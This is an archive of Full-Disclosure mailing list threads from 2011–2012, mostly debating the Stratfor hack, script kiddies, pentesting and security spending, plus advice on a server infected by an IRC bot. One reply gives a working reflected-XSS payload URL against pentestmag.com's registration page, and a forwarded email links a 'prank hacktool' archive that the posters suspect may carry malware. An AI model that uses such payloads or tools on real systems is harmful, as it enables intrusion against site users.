money/confidential info through physical or electronical means. If anything, the closest type of criminal would be a con man, which seems fitting given how many of today's attacks have an element of social engineering. nope. of course social engineering can be compared to Confidence trick, because it is a Confidence trick. but social engineering is only one vulnerability from the many, and usually it is used together with other methods (you get the credentials using that, then you proceed and access the system using those credentials, which is the gaining unauthorized access to the system. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
Well that's what you get when you let profit margins dictate security policy. You guys act pretty tough when you argue with each other online but you can't stand up to some corporate idiots? Sounds like this industry could benefit from these kids even more since they are driving home the points you all are supposed to be warning them about. Maybe you should try out at your company to hire a kiddie, and tell us how it turned out. Usually the ones shittalking here are those without a decent job imo... -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
On Thu, Jan 12, 2012 at 10:53 AM, Laurelai laure...@oneechan.org wrote: On 1/12/12 3:49 AM, Ferenc Kovacs wrote: Well that's what you get when you let profit margins dictate security policy. You guys act pretty tough when you argue with each other online but you can't stand up to some corporate idiots? Sounds like this industry could benefit from these kids even more since they are driving home the points you all are supposed to be warning them about. Maybe you should try out at your company to hire a kiddie, and tell us how it turned out. Usually the ones shittalking here are those without a decent job imo... -- Ferenc Kovács @Tyr43l - http://tyrael.hu I have a great job. so you think that you are shittalking? or how else could be your job relevant here? -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
Because the ones with the so called ethics either lack the technical chops or lack the enthusiasm to find simple vulnerabilities. Not very ethical to take a huge paycheck and not do your job if you ask me. If the only thing missing to secure those systems was somebody being able to use sqlmap and xss-me, then that could be fixing without hiring people who already proved that they aren't trustworthy. from my experience, the lack of security comes from the management, you can save money on that (and qa) on the short run. so companies tend to hire QSA companies to buy the paper which says that they are good, when in fact they aren't. most of them don't wanna hear that they are vulnerable and take the risks too lightly. if they would take it-security seriously it simply couldn't be owned through trivial, well-known attack vectors. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Astaro Security Gateway v8.1 - Input Validation Vulnerability
On Mon, Jan 9, 2012 at 3:15 PM, Markus Hennig markus.hen...@sophos.comwrote: Hi all, Astaro hereby confirms the described vulnerability. In spite of the text below it is not remote exploitable, but needs a valid administration account to access the web configuration interface called WebAdmin. if it is an XSS attack, then why would the attacker need an account to exploit it? Within WebAdmin a privilege escalation is the worst case scenario which can happen. The user with higher privileges has to open a preview window of a XSS manipulated object. yeah, if the malicious person can bait a logged in user to visit the prepared url, that would allow the attacker to create an account. Because every access and all object modifications are logged with username and IP and because the issue is not remote exploitable we will fix it within the regular Up2Date schedule with release of version 8.301. uhm, I don't see why would a proper logging mitigate the fact that the system is compromised. but it is a good thing that you are fixing it. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
Albeit you didn't addressed to me, but I also called them kiddies, so here are my thoughts. Valdis you make me curious - how do you know that most are kids, and script kiddies? Valdis didn't stated that the majority of the hackers are kids, or script kiddies, what he did stated: Perhaps these companies should try to hire the kids owning them instead of crying to the feds. Most of the kids are skript kiddies, So Laurelai implied that the companies are owned by kids, and Valdis replied that those kids are mostly script kiddies. The label 'script kiddies' has been used for over 20 years and well, kids do grow old... aren't the script kiddies really script men these days? only if you think that the current kiddies are the exact same people than back there. imo the vast majority of the kiddies will either mature and/or busted, so he/she will give up on the blackhat stuff, and/or grow in skills so he/she will be a real hacker(in one way, or another). The label script kiddie tends to downplay their existence. It has a tone of strong security officers, men of renown, men with beards who look down on those petty script kiddies from their high places of arcane knowledge possessed by a mere few. the term is and always was pejorative/derogatory by definition: A script kiddie or skiddie,[1] occasionally skid, script bunny,[2] script kitty,[3] script-running juvenile (SRJ) or similar, is a derogatory term used to describe those who use scripts or programs developed by others to attack computer systems and networks and deface websites.[4] http://en.wikipedia.org/wiki/Script_Kiddie Isn't it more likely that the people who massively pwned Stratfor are indeed mature and serious? imo most script kiddies are teens/young adults, and I also think that most teens/young adults who are interested in the IT security are only have script kiddie skills. My resons to believe this: - learning serious skills take some time, so it is fairly rare to have those at such a young age, so most of the young ones usually isn't there yet. of course if you have only to master sqlmap and xss-me then it is a different story. - kids are more likely to take serious risk for the fun or fame only: they aren't mature enough to be afraid of the consequences and they don't have an existence which they are afraid to lose. on a related note see http://www.medicinenet.com/script/main/art.asp?articlekey=51852 It's easy to establish that the lulzboat people for lack of a better term, are more mature than the technicians at Stratfor will ever be. Better to call them security kiddies, I can understand that. in what meaning are you using the word mature here? they(LulzSec) are/were trolling the industry, they didn't really shown anything new, just that the OWASP top10 vulns are still there and even for big companies. I would be really surprised if it would ever to discovered that the main players behind LulzSec ware over 25, or they would have a family to take care of. even if you could get away with the shit that they put up, a mature person wouldn't risk to get busted over what they achieved (fame and fun). Of course this is only my opinion on the issue, maybe somebody else with more experience on the field can come up with a better explanation or pointing out the flaws in my logic. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Fw: Who is behind Stratfor hack?
nice job letting him control you! On Sun, Jan 8, 2012 at 6:16 PM, Laurelai laure...@oneechan.org wrote: I don't know why you emailed this to me, perhaps you were looking for attention or something, so ive forwarded it to the FD list so you can get all the attention you want. Cheers. Original Message Subject: Fw: Who is behind Stratfor hack? Date: Sun, 8 Jan 2012 00:06:23 -0800 (PST) From: andrew.wallace andrew.wall...@rocketmail.com andrew.wall...@rocketmail.com Reply-To: andrew.wallace andrew.wall...@rocketmail.comandrew.wall...@rocketmail.com To: Laurelai laure...@oneechan.org laure...@oneechan.org - Forwarded Message - *From:* andrew.wallace andrew.wall...@rocketmail.comandrew.wall...@rocketmail.com *To:* feedb...@stratfor.com feedb...@stratfor.com feedb...@stratfor.com feedb...@stratfor.com *Sent:* Saturday, December 31, 2011 1:50 AM *Subject:* Who is behind Stratfor hack? If this turns out to be the person who hacked your web site, I would like a cash reward. Andrew --- http://pastebin.com/f7jYf5Wd 46. lol xD --- Should we read into this too much? Andrew --- 48. We almost have sympathy for those poor DHS employees and australian billionaires who had their bank accounts looted by the lulz (orly? i just fapped). --- The guy we know is australian... Andrew --- 51. We call upon all allied battleships, all armies from darkness, to use and abuse these password lists and credit card information to wreak unholy havok upon the systems and personal email accounts of these rich and powerful oppressors. Kill, kitties, kill and burn them down... peacefully. XD XD --- Signed as XD again. Andrew --- Last email I have from him is 23rd December... same kind of grammar as the Stratfor pastebin. It seems he disappeared just as the Stratfor news broke just before Christmas. Andrew - Forwarded Message - *From:* xD 0x41 sec...@gmail.com sec...@gmail.com *To:* Larry W. Cashdollar lar...@me.com lar...@me.com *Cc:* full-disclosure@lists.grok.org.uk *Sent:* Friday, December 23, 2011 1:26 PM *Subject:* Re: [Full-disclosure] Mobile Prank Hacktool hi Larry! Hope your doing well mate ;) , anyhow, here.. i did manage to get it via windows..maybe megaupload.com has blocks for lynx or other linux ? notsure and, not caring to test,..lol...anyhow, sanme file..enjoy, cheers. (Oh, id always run this with atleast a basic Sandbox, like sanboxie ,wich would makesure that never loose our data incase there is malws,wich,usually tools like this always do..but, anyhow, it is not from me, altho, many would probably wish it was :s sad... Looks like the link is unavailable. -- Larry C$ Oh, i was able to download what looks like, a very interesting application and files..very cool...well, to look atm, atm :P I did browse the src, just then directly upped it to hotfile.com..i think lynx is abit better with hotfile...anyhow, here is a working link: http://hotfile.com/dl/138283571/f9ef676/Mobile_Prank_Hacktool.rar.html anyhow, cheers larry, letme know if worked, ifnot, ill put it ion a ftp or sumthin :s but, then id be checking my own cobnnection :P~ lol...tc buddy! XD // hax...@haxshells.us @ crazycoders.com crazycoders.us ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
On Sat, Jan 7, 2012 at 8:10 PM, Jeffrey Walton noloa...@gmail.com wrote: http://bolt.thexfil.es/84e9h!t was an interesting link - it demonstrated the pwnage. It looks like these folks gained access via PHP. Stratfor was using a Linux based system system, but PHP was version 1.8 from 2009 (perhaps with some back patches). Current version of PHP is 5.3.8 (http://www.php.net/). O really? PHP 1.8? how would you compile that on a modern linux distro? how would you run drupal on top of it? // $Id: default.settings.php,v 1.8.2.4 2009/09/14 12:59:18 goba Exp $ that is a line from the default drupal config file. I agree that the php app was the most likely source of the intrusion, I would guess that they didn't kept the drupal core and the contrib modules up-to-date, and they were owned through some old vulnerability. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
On Sun, Jan 8, 2012 at 12:03 AM, Laurelai laure...@oneechan.org wrote: On 1/7/12 3:50 PM, valdis.kletni...@vt.edu wrote: On Sat, 07 Jan 2012 16:25:35 EST, Shyaam Sundhar said: Although, once they have gained popularity and to a stage where a garage office becomes a shop floor and a @home biz becomes a rent-a-million$-building office, it is time to shift priorities. If finding people who are competent enough to secure a payroll system for a company of 10 people is difficult, what makes you think that it's easy to find people who can secure the systems for a company of 1,000? As Stratfor has demonstrated, the talent pool of *really* competent security people is shallow enough that there's not even enough to secure the security companies. And it's not just Stratfor - when was the last time this list went a week without mocking a security company for its lack of clue? It's an industry-wide problem - there's a *severe* shortage of experts. And even though schools like DeVry and ITT are churning out lots of people with entry level certifications, I'm not at all sure that helps the situation - we end up with a lot of people who are entry level, and don't realize how much they don't know. That makes them almost more dangerous than not having anybody at all. Sort of like if you walk alone through a scary part of town, you actually stand a good chance because you *know* you're alone and will act accordingly - but if you have a bodyguard with you, you're likely to act differently, and end up totally screwed when you find out said bodyguard has a belt in martial arts, but zero experience in street fighting... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Perhaps these companies should try to hire the kids owning them instead of crying to the feds. why do you think that kiddies using tools like sqlmap would be able to defend them from other kids? -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
On Sun, Jan 8, 2012 at 1:24 AM, Laurelai laure...@oneechan.org wrote: On 1/7/12 6:20 PM, valdis.kletni...@vt.edu wrote: On Sat, 07 Jan 2012 17:37:44 CST, Laurelai said: Because they pay the kids to own them in a safe manner to show that It's not as simple as all that. A good pen-tester needs more skills than just how to pwn a server. You need some business smarts, and you need to be *very* careful about writing the rules of engagement (some pen tests that involve physical attacks can literally get you shot at if you screw this part up), and then *sticking with them* (you find a major social engineering problem while doing a black-box test of some front-end servers, you better re-negotiate those rules of engagement before you do anything else). Also, once a pen test starts, you can't take your time and poke it with the 3 or 4 types of attacks that you're good at - you have 3 weeks starting at 8AM Monday to hit it with 37 different classes of attacks they're likely to see and another 61 types of attacks they're not likely to see and aren't expecting. And be prepared to work any one of those 94 from looks like might be an issue to something you can put in a report and say You Have A Problem. Almost no company is stupid enough to hire a pen testing team without that team posting a good-sized performance bond in case of a screw-up taking out a server, or a rogue pentester stealing the data. (ESPECIALLY in this case, you *already* caught them stealing the data once :) And the kids are going to land a $1M performance bond, how? (Hint - think this through. Really good pentesters make *really* good bucks. If those kiddies had what it took to be good pentesters, they'd already be making bucks as pentesters, not as kiddies) their so called expertsd are full of shit, then they fire said experts and hire competent people saving time money and resources, try and Doesn't scale, because there's not enough competent people out there. There's 140 million .coms, there aren't 140 million security experts out there. It's not a new idea - I've heard it every year or two since probably before most of the people on this list were born. The fact that almost no companies actually *do* it, and that those hackers who have successfully crossed over to consulting are rare enough that you can name most of them, should tell you something about how well it ends up working in practice. Well enjoy your doomed industry then. Ill continue to take great pleasure as the so called experts get owned by teenagers. imo public shaming(ie. owned by kiddies, usually they get bigger media attention) can force companies to take security more seriously, but imo hiring the kiddies isn't the solution. even if he/she happens to be the superstar, who given the chance would be able to secure your infrastructure, but the industry is rotten mostly because it-sec isn't as high priority as it should be. it is an added-value, usually bolted-on top of the screwed up legacy processes/softwares, and the higher-ups expect it to be bought by money alone. they would pay for the cert, they would pay for the hacker-proof seal, they would pay for the insurance, and the decent looking it-security consulant company, but they won't change the flawed processes, and the bad priorities. of course many of them will get owned, lose a good chunk of money, some of them even will go out of business, but until most of them can get away with those broken model, they won't try to fix the underlying problem. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
On Sun, Jan 8, 2012 at 2:42 AM, valdis.kletni...@vt.edu wrote: On Sun, 08 Jan 2012 01:37:21 +0100, Ferenc Kovacs said: imo public shaming(ie. owned by kiddies, usually they get bigger media attention) can force companies to take security more seriously, but imo hiring the kiddies isn't the solution. It matters a lot less than you think. Go look at Sony's stock price while they were having their security issues - it was already sliding *before* PSN got hacked, but continued sliding at the *exact same rate* for several months, with no visible added dip due to the multiple hacks they had. The hack at TJX didn't cripple that company either. Cost them a bunch, but nothing they couldn't survive - most companies that size already budget a lot more for unforseen events than the hacks cost them. able to secure your infrastructure, but the industry is rotten mostly because it-sec isn't as high priority as it should be. As high priority as the IT Sec people usually think it should be, or as high priority as a cold hard-line analysis of business cost/benefts says it should be? IT people tend to be *really* bad at estimating actual bottom-line costs. it is an added-value, usually bolted-on top of the screwed up legacy processes/softwares, and the higher-ups expect it to be bought by money alone. Remember that at the C level, *everything* is bought by money alone. An initiative will cost $X in capex, $Y in manpower costs, and is predicted to return $Z per year. If Z is bigger than X+Y, we proceed, if not, we don't. (Of course, the fun is in nailing X Y and Z down to accurate numbers :) company, but they won't change the flawed processes, and the bad priorities. Remember that computer security is almost always a cost center, not a profit center, and one of those bad priorities is usually make more money. They aren't going to change the flawed process (which will cost money), unless you can demonstrate how that will impact the bottom line. Just like I *could* replace my already-paid-off car that gets 27 miles to the gallon with one that gets 42, and save $50 month in gas- but then have a $250/month car payment to make. That doesn't make fiscal sense, and often neither does fixing the flawed process. of course many of them will get owned, lose a good chunk of money, some of them even will go out of business, but until most of them can get away with those broken model, they won't try to fix the underlying problem. And you know what? *Every single decision* a business makes is like that. You run a restaraunt, and make a bet that you can sell a fajita that's 20% bigger than your competitor, for 50 cents less,and still make money. Maybe you're right, and you end up expanding into a nationide fajita chain. Maybe you're not - something like 50% of restaraunts fold in under 3 years. You manage an office building complex, and make a bet that if there's a fire, only one of the buildings will burn down and not all of them, so you don't insure for everything burning down because that's a *lot* higher premium per year and you don't really see them *all* burning as being likely. If one burns down, you collect the insurance, rebuild, and get on with running an office complex. If they all burn down, you're probably screwed. Unless you're one lucky guy like Larry Silverstein, and they're ruled separate events at the WTC so you get paid for all the buildings anyhow: http://articles.cnn.com/2004-12-06/justice/wtc.trial_1_larry-silverstein-single-occurrence-insurers?_s=PM:LAW You run a company, and make a bet that there's only a X% chance of being hacked, and it will probably cost you $Y, so you spend $Z. Maybe you guess wrong, like Sony did, maybe you don't, and all the money you didn't spend on security becomes profit, not cost. But it's the same thing - you estimate your chances, and place your bet. It's called the way business works. it seems that you are missing my point. I don't try to say that security should be the top priority, I'm saying that: - it should be handled the same way as QA, it's not a feature, it's a way of doing things, you can't just buy it from a vendor without changing anything on your side. - currently the efforts for it security in most cases are below what a formal risk analysis/evaluation would identify for most of the companies out there. A kiddie with no formal education, or relevant experience, but with being handy using a pc and the internet shouldn't be able to own companies and create loss/stole millions of dollars. So I would be curious what is your opinion about those two points. btw: A Sony is a good counter-example, but we also see CA companies recently going out of business after being hacked, usually losing customer trust is more grave where the trust is more important to begin with. Maybe people didn't started buying less Sony phones/tvs/ps3, etc. but I would bet, that less
Re: [Full-disclosure] PenTest mag
http://pentestmag.com/wp-login.php?action=registeruser_login=john@somewhere.com%3C/sCrIpT%3E%3CsCrIpT%3Ealert(87118)%3C/sCrIpT%3E 2011/12/8 Gage Bystrom themadichi...@gmail.com Not really. It it isn't exploitable in any sense of the word its not a vulnerability. It's akin to opening up firebug, writing the generic xss PoC and calling the site vulnerable :P I'd love to bash on these guys as much as you want to, but let it be a real vulnerability. If it is one, then kudos. On Dec 7, 2011 3:16 PM, Tomy supp...@vs-db.info wrote: it does not matter, it's about the fact that someone who publishes such a newspaper should know his stuff.. Tomy Wiadomość napisana przez Gage Bystrom w dniu 8 gru 2011, o godz. 00:04: Nice, but is it stored? Or at least reflective? On Dec 7, 2011 2:59 PM, Tomy supp...@vs-db.info wrote: still vulnerable: sample: http://pentestmag.com:80/wp-login.php?action=registerhttp://pentestmag.com/wp-login.php?action=register (XSS) e-mail: john@somewhere.com/sCrIpTsCrIpTalert(87118)/sCrIpT LOL Wiadomość napisana przez xD 0x41 w dniu 7 gru 2011, o godz. 23:30: Tomy supp...@vs-db.info ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Tomy supp...@vs-db.info ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] prosec
yeah, I can confirm that this image was served on the original url. On Tue, Dec 6, 2011 at 5:38 PM, adam a...@papsy.net wrote: Pretty sure it's supposed to be: http://de-motivational-posters.com/images/karma-sometimes-assholes-get-what-they-deserve.jpg On Tue, Dec 6, 2011 at 10:34 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: No workie. ** ** *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *white powder *Sent:* Tuesday, December 06, 2011 3:10 AM *To:* full-disclosure@lists.grok.org.uk *Subject:* [Full-disclosure] prosec ** ** http://130.89.241.130/~tjibbe/pics/karma-sometimes-assholes-get-what-they-deserve.jpg u had it comin, kcope AB u will be next welcome to the age of the whitehat ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] one of my servers has been compromized
On Mon, Dec 5, 2011 at 11:44 AM, Lucio Crusca lu...@sulweb.org wrote: Hello *, I'm not new here, but I've mostly lurked all the time through gmane. I never believed it could happen to me until it actually happened: they compromized one of my servers. It's a Ubuntu 10.04 server with all security patches regularly applied. I'm inclined to believe they used some hole in the web application, which is a old customized Virtuemart version (1.1.3), which is not upgradable because of the invasive code customizations (I'm not the author of that code, so I have no clue about what had been changed back then). Now the problem for me is to track down the security hole. Here is the email my provider received and forwarded to me: Subject: ISP Report; botnet activity on irc.undernet.org [...] Hello, I am an operator on the irc chat network, irc.undernet.org and i would like you to investigate the owner of the Ip addresses that are listed at the foot of this email. This/These host(s) have likely been compromised, and had an altered/rogue process installed on it, and was part of a botnet that was found on our network. The exploit or compromise running on this system is likely to be an irc bot. Can you please alert the person who is responsible, for its security to patch/upgrade, remove the irc process and secure their system. = Unix System owners = A favourite place for hiding the bot(s) is in tmp and in /var/tmp/ or /dev/shm/ or in a users home directory sometimes it may be hidden like /tmp/. ./ or similar. The bot files can usually be found by running these one line commands as the root user. find / -exec grep -l undernet {} + find / -exec grep -l sybnc {} + find / -name *.set | perl -pe 's/.\/\w+-(\w+)-.*/$1/' | sort | uniq find / -name inst | perl -pe 's/.\/\w+-(\w+)-.*/$1/' | sort | uniq netstat -tanp lsof -i tcp:Port number *netstat looking for connections to remote port 6667 or the range of ports between 6660-7000 once you find the port you can use the command, lsof -i tcp:portnumber to determine which process/user it is running under, and terminate it. = Windows System Owners = most windows bots are mIRC scripted bots and generally need a file called mirc.ini to run, you should search for this file. Run a good antivirus scanner and firewall. This Ip/host may be removed from our Irc network due to the risks it presents to our users. Should you need any help with removing the files or bot process, feel free to contact me by mail or on our network, which you connect to using any irc client and issuing /server irc.undernet.org I look forward to your reply Scot * Affected host/IPs, capture time is GMT+1: United kingdom and servers they were connected to. Please note: when resolving server names to IP Addresses that all our servers end with .undernet.org (for example) Tampa.FL.US. is actually Tampa.FL.US.undernet.org Important: If you reply to this mail needing further information, please leave this mail intact, or supply us with the IP Address(es) in question, as we reference these mails by the unique IP Address Time of Capture: DECEMBER 3, 2011 10:03:48 PM List of IP address(es) and server it connected to: my.server.ip.address (CHICAGO.IL.US BUDAPEST.HU.EU MONTREAL.QC.CA.undernet.org) I've run the find commands and found a number of file with the first find, under /tmp/.m Deleted them, looked up remote connections with netstat, killed perl processes that where trying to connect to port 6959 (only trying because I've now set up iptables so that they actually can't), but those processes kept spawning. Checked crontab of www-data, found the launcher, removed it. Now the problem is: how do I pervent further abuse? What should I search in the logs (if anything) to spot the security hole? TIA Lucio. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ If you take security seriously, you should remove that box from the network(or take a snapshot and wipe everything and reinstall from scratch), and start the investigation according to your (security) incident response plan. In the meantime you can start restoring the services on a clean server, but you should consider the compromised server as fully compromised, so you shouldn't restore data from that server, until you can't guarantee without a proof that the data is intact/genuine. http://en.wikipedia.org/wiki/Computer_security_incident_management Based on your area of business, you can be obligated to report the breach to some kind of authority and co-operate with them resolving the issue. If you have offsite backups and/or externals logs, which you can trust, that can help you to pinpont that when did the breach happen, and what extent
Re: [Full-disclosure] Large password list
On Fri, Dec 2, 2011 at 10:26 PM, Charles Morris cmor...@cs.odu.edu wrote: Valdis, (For real fun, consider that published and unpublished works are treated differently. And a password list almost always becomes a published work without the permission of the author(s) ;) Talking of currently implemented systems... One could argue that the author of lists resulting from cracked hashes is the cracker, as the cracker is simply computing one of the infinite collisions that each hash intrinsically has. on a related note: http://en.wikipedia.org/wiki/Illegal_number http://en.wikipedia.org/wiki/Illegal_prime -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Client aproach
how not to do it: http://www.securityweek.com/hungarian-man-pleads-guilty-hacking-marriott-systems-demanding-job-it-dept http://www.infoworld.com/d/security-central/hungarian-man-charged-hacking-sony-ericsson-site-047 On Wed, Nov 30, 2011 at 11:56 AM, Miguel Lopes theoverb...@gmail.comwrote: Hi List, I found some major design flaws and vulnerabilities on a local webstore, but now i would like to tell the owner nicely and maybe profit from it?! Does anyone have some tips on how to inform a potential client of their vulnerabilities? Thanks in advance, Miguel Lopes ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Context IS Advisory - Apache Reverse Proxy Bypass Vulnerability
On Wed, Oct 5, 2011 at 7:15 PM, Context IS - Disclosure disclos...@contextis.co.uk wrote: ===ADVISORY== Systems Affected:Apache httpd Severity:High Category:Proxy Bypass Author: Context Information Security Ltd Reported to vendor: 16th November 2011 Advisory Issued: 5th October 2011 Reference: CVE-2011-3368 ===ADVISORY== It seems that the apache devs couldn't properly fix this: http://marc.info/?l=apache-httpd-devm=132205829523882w=2 Prutha Parikh from Qualys reported a variant on the CVE-2011-3368 attackagainst certain mod_proxy/mod_rewrite configurations. A new CVE name,CVE-2011-4317, has been assigned to this variant. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CodeV discovers 31 vulnerabilitys on 5 OS softwares
There was an error!Your code was not submited. On Wed, Nov 23, 2011 at 12:11 PM, Press - Dognædis pr...@dognaedis.comwrote: Dear FullDisclosure, CodeV is a static code analysis tool (currently for php only, but soon to be developed to other languages) developed by Dognaedis (https://www.dognaedis.com/) to offer a tool to integrate in the development of the life cycle of software in order to detect vulnerabilities that arise from bad input validations as soon as they hit the code. The tool has a public demo version that is limited to a script with 250 lines of code and is available at https://codev.dognaedis.com/. We analyzed some Open Source software to test our own tool and discovered 31 new vulnerabilities in 5 different opensource softwares. Following responsible disclosures of discovered vulnerabilities throughout CodeV's Open Source Software analysis, we are here reporting all the vulnerabilities discovered as soon as possible to the community, offering security not only to our clients but to the entire public. All the vulnerabilities brought to public previously followed the necessary disclosure protocol to the responsible teams. The vulnerabilities discovered can be found in https://www.dognaedis.com/vulns/. Thank you for your time and we hope you enjoy CodeV. -- Press - Dognaedis Dognædis, Coimbra - Portugal http://www.dognaedis.com DECLARAÇÃO DE PRIVACIDADE: Esta mensagem é estritamente confidencial e deve ser acedida somente pelas pessoas e/ou entidades a quem ela foi endereçada, não sendo permitida a divulgação, modificação, visualização, ou qualquer outro tipo de utilização desta mensagem por terceiros. Caso não seja um dos destinatários, a Dognædis agradece que informe o remetente o mais rapidamente possível sobre o extravio ocorrido. DISCLAIMER: This message is confidential in any way, and can only be accessed by the persons or entities to whom it is addressed. If you are not one of them, Dognædis will thank you if you inform the author, as soon as possible, about the error that ocurred. It is totally forbidden the disclosure, modification, visualization, or other kind of use of the message and the respective contents to those who are not addressed herein. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NEVER AGAIN
Maybe it's not the case now, but I experienced multiple times on this list, that the replies are getting hours before the original mails, so I wouldn't be surprised if the mails from Andrew were also reply-all. On Tue, Nov 22, 2011 at 3:14 PM, Christian Sciberras uuf6...@gmail.comwrote: James, could you please stop publishing emails intended for private use? It's getting plain ridiculous the amount of crap from this list I (and the rest) have to deal with every day. On Tue, Nov 22, 2011 at 3:06 PM, James Rankin kz2...@googlemail.comwrote: Whatever On 22 November 2011 14:05, andrew.wallace andrew.wall...@rocketmail.comwrote: The email is nothing to do with me or my consultancy. You need better analysis skills and a good lawyer. --- Andrew Wallace -- *From:* James Rankin kz2...@googlemail.com *To:* andrew.wallace andrew.wall...@rocketmail.com *Cc:* Darren Martyn d.martyn.fulldisclos...@gmail.com; Antony widmal antony.wid...@gmail.com; xD 0x41 sec...@gmail.com; Martin Allert all...@arago.de; full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk; phocean 0...@phocean.net; Nikolay Kichukov hijac...@oldum.net; valdis.kletni...@vt.edu valdis.kletni...@vt.edu *Sent:* Tuesday, November 22, 2011 2:01 PM *Subject:* Re: [Full-disclosure] NEVER AGAIN Strange. Your other personality said much the same thing. On 22 November 2011 13:57, andrew.wallace andrew.wall...@rocketmail.com wrote: You're making the worst mistake possible for yourself. --- Andrew Wallace -- *From:* James Rankin kz2...@googlemail.com *To:* andrew.wallace andrew.wall...@rocketmail.com *Cc:* Darren Martyn d.martyn.fulldisclos...@gmail.com; Antony widmal antony.wid...@gmail.com; Martin Allert all...@arago.de; full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk; phocean 0...@phocean.net; Nikolay Kichukov hijac...@oldum.net; valdis.kletni...@vt.edu valdis.kletni...@vt.edu *Sent:* Tuesday, November 22, 2011 1:51 PM *Subject:* Re: [Full-disclosure] NEVER AGAIN Consultancy. Hehe. You seriously need treatment for schizophrenia. Why don't you go and argue with your alter ego? Please tell your solicitor he is welcome to talk to mine any day. Regards, JR On 22 November 2011 13:48, andrew.wallace 